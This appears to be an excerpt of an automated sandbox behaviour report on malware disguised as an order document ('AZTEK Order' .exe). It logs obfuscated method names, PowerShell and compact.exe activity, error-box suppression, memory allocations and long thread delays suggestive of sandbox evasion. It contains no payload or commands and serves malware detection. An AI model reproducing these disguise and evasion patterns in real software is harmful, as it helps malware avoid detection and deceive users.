Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, o26AjyZyl3gqQ7oXg6.cs	High entropy of concatenated method names: 'T2QuaAVOq5', 'pR0ue4OQLQ', 'XJKuoFxnNH', 'HmmuZ63kFp', 'rI9uWpu18R', 'H8Xuv42bSQ', 'tdJu8pYTZN', 'KAMuVCo5qt', 'lAguNwjToc', 'DtuudfXIOt'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, GL6gb9sBp7fYqEvq2Q.cs	High entropy of concatenated method names: 'KkiVxEvJ3F', 'KpiV4Uv6ke', 'ioBVuG2auq', 'HXlVb33PMn', 'NUsVtT8Ega', 'kk5V1N03Zj', 'JekVA2et5Q', 'dQbVlFGkfH', 'GfUVBXHQhc', 'yEiVYRgcUO'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, fEPxOLqyxV0ISeYYpd.cs	High entropy of concatenated method names: 'hEmbCiojYN', 'MDib6DjB6I', 'LsLunYOHtF', 'kwOuTHb6Q3', 'qN4uUXAaGk', 'QRhuJKagdx', 'NehuiMuG7Q', 'HL1u5I7oSS', 'kFHu7k0mIY', 'LcCuORBMxF'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, l7GCTdzeZ7vklkKi9T.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OlgNPlIuCu', 't46NW6QBH7', 'vdoNvjFq0f', 'MpXN8jHfsl', 'UuyNV7sA5q', 'IflNNWJBJ9', 'GjhNdnLcpt'

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	File created: \art_spec. 4008670601 aztek order _ 7.3.2024.exe
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	File created: \art_spec. 4008670601 aztek order _ 7.3.2024.exe
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	File created: \art_spec. 4008670601 aztek order _ 7.3.2024.exe	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	File created: \art_spec. 4008670601 aztek order _ 7.3.2024.exe	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: 4790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: 7A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: 8A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: 8C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: 9C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: 9F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: AF90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: BF90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: D060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: E060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: F060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Memory allocated: F760000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5097	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2162	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Window / User API: threadDelayed 3386	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Window / User API: threadDelayed 6586	Jump to behavior

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\compact.exe	API coverage: 2.8 %

Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe TID: 1280	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 528	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2632	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 5112	Thread sleep count: 3386 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 5112	Thread sleep time: -6772000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 5112	Thread sleep count: 6586 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 5112	Thread sleep time: -13172000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe TID: 5888	Thread sleep count: 34 > 30	Jump to behavior
